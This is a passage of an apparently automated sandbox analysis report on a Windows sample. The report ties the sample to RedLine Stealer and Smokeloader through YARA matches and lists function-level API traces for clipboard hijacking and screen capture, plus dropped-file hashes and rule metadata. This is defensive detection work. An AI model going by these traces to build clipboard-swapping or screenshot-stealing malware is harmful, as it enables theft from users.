                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_02491942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02491942
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_02492361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02492361
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_02492605 NtdllDefWindowProc_W,PostQuitMessage,0_2_02492605
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004280220_2_00428022
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004071AB0_2_004071AB
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004373D90_2_004373D9
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004274840_2_00427484
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004285600_2_00428560
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0043D6780_2_0043D678
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004166AF0_2_004166AF
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004137250_2_00413725
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004277F60_2_004277F6
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0040E9740_2_0040E974
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0042EAE00_2_0042EAE0
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00427AA00_2_00427AA0
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00418AAF0_2_00418AAF
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00436CBF0_2_00436CBF
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00427D670_2_00427D67
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_00413F0B0_2_00413F0B
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B82890_2_024B8289
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024BED470_2_024BED47
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024A41720_2_024A4172
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B76EB0_2_024B76EB
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024BD7550_2_024BD755
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B87C70_2_024B87C7
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B7A5D0_2_024B7A5D
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_0249EBDB0_2_0249EBDB
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024A69160_2_024A6916
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024A398C0_2_024A398C
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024C6F260_2_024C6F26
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B7FCE0_2_024B7FCE
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024BED470_2_024BED47
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024B7D070_2_024B7D07
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_024A8D160_2_024A8D16
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0040B44C3_2_0040B44C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004087903_2_00408790
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004260543_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043B0683_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004140703_2_00414070
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043C0203_2_0043C020
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004398303_2_00439830
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043D8303_2_0043D830
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041B0E13_2_0041B0E1
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041F0E03_2_0041F0E0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004210E03_2_004210E0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004358903_2_00435890
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004340983_2_00434098
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043D0A03_2_0043D0A0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004180A93_2_004180A9
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0040A9403_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041714B3_2_0041714B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0040C9173_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042B12C3_2_0042B12C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042F1303_2_0042F130
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042B1C03_2_0042B1C0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041D9E03_2_0041D9E0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004361E03_2_004361E0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004111E53_2_004111E5
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004059F03_2_004059F0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004239F23_2_004239F2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043C1F03_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0040F9FD3_2_0040F9FD
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004259903_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043B9A13_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004062503_2_00406250
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041D2703_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00424A743_2_00424A74
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004092303_2_00409230
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00423A343_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004192DA3_2_004192DA
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043D2F03_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043C2803_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004152983_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004082AE3_2_004082AE
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004252BA3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041CB053_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00428BC03_2_00428BC0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004143C23_2_004143C2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00402BD03_2_00402BD0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00428BE93_2_00428BE9
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004373993_2_00437399
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004393A03_2_004393A0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00416BA53_2_00416BA5
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004293AA3_2_004293AA
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004223B83_2_004223B8
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00436C003_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004234103_2_00423410
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042B4FC3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00404CB03_2_00404CB0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004074B03_2_004074B0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041DD503_2_0041DD50
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004185783_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042D57E3_2_0042D57E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004245023_2_00424502
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00421D103_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0040DD253_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041D5E03_2_0041D5E0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004175823_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043D5803_2_0043D580
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00427DA23_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004205B03_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042C64A3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00426E503_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042B4F73_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0043462A3_2_0043462A
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004356303_2_00435630
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004066E03_2_004066E0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042C6E43_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00430EF03_2_00430EF0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004256F93_2_004256F9
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00422E933_2_00422E93
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00425E903_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004156A03_2_004156A0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041BEA03_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00438EA03_2_00438EA0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00435EA03_2_00435EA0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00405EB03_2_00405EB0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00415F663_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004197703_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_004097003_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042C7263_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0042C7353_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_0041DF803_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00402FA03_2_00402FA0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AEC0E83_2_00AEC0E8
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B080093_2_00B08009
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFC1AC3_2_00AFC1AC
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFE1E73_2_00AFE1E7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B191073_2_00B19107
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B161073_2_00B16107
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B081083_2_00B08108
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE61173_2_00AE6117
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B111573_2_00B11157
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B142FF3_2_00B142FF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1B2CF3_2_00B1B2CF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE32073_2_00AE3207
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF73B23_2_00AF73B2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0B3933_2_00B0B393
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0F3973_2_00B0F397
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE83C73_2_00AE83C7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1D3073_2_00B1D307
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF734A3_2_00AF734A
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFB3483_2_00AFB348
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFF3473_2_00AFF347
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B013473_2_00B01347
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE64B73_2_00AE64B7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE94973_2_00AE9497
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFD4D73_2_00AFD4D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0B4273_2_00B0B427
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF144C3_2_00AF144C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B164473_2_00B16447
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE45D73_2_00AE45D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFC5283_2_00AFC528
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1D5573_2_00B1D557
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF95413_2_00AF9541
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B096113_2_00B09611
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B196073_2_00B19607
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0D7E53_2_00B0D7E5
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1D7E73_2_00B1D7E7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF87DF3_2_00AF87DF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE77173_2_00AE7717
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0B7633_2_00B0B763
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0C8B13_2_00B0C8B1
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B148913_2_00B14891
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B158973_2_00B15897
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B008173_2_00B00817
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0B75E3_2_00B0B75E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFD8473_2_00AFD847
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0C99C3_2_00B0C99C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0C98D3_2_00B0C98D
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE89F73_2_00AE89F7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF99D73_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFC9213_2_00AFC921
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE99673_2_00AE9967
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE69473_2_00AE6947
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B0C94B3_2_00B0C94B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B19A973_2_00B19A97
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1DA973_2_00B1DA97
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B15AF73_2_00B15AF7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF7BA73_2_00AF7BA7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AEABA73_2_00AEABA7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B05BF73_2_00B05BF7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AECB7E3_2_00AECB7E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B03C9B3_2_00B03C9B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B04CF43_2_00B04CF4
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE3C273_2_00AE3C27
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B1BC083_2_00B1BC08
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AEFC643_2_00AEFC64
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFDC473_2_00AFDC47
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE5C573_2_00AE5C57
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE2E373_2_00AE2E37
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B16E673_2_00B16E67
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AFDFB73_2_00AFDFB7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AEDF8C3_2_00AEDF8C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AF8F353_2_00AF8F35
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00AE4F173_2_00AE4F17
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 3_2_00B01F773_2_00B01F77
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\3247.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: String function: 00410720 appears 52 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: String function: 0040F903 appears 36 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: String function: 024A0987 appears 52 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: String function: 0040FDB2 appears 125 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: String function: 024A0019 appears 121 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: String function: 00AF42C7 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: String function: 00AE81D7 appears 78 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724
                  Source: XIaCqh1vRm.exeBinary or memory string: OriginalFileName vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exe, 00000000.00000003.1318381994.0000000002500000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: XIaCqh1vRm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
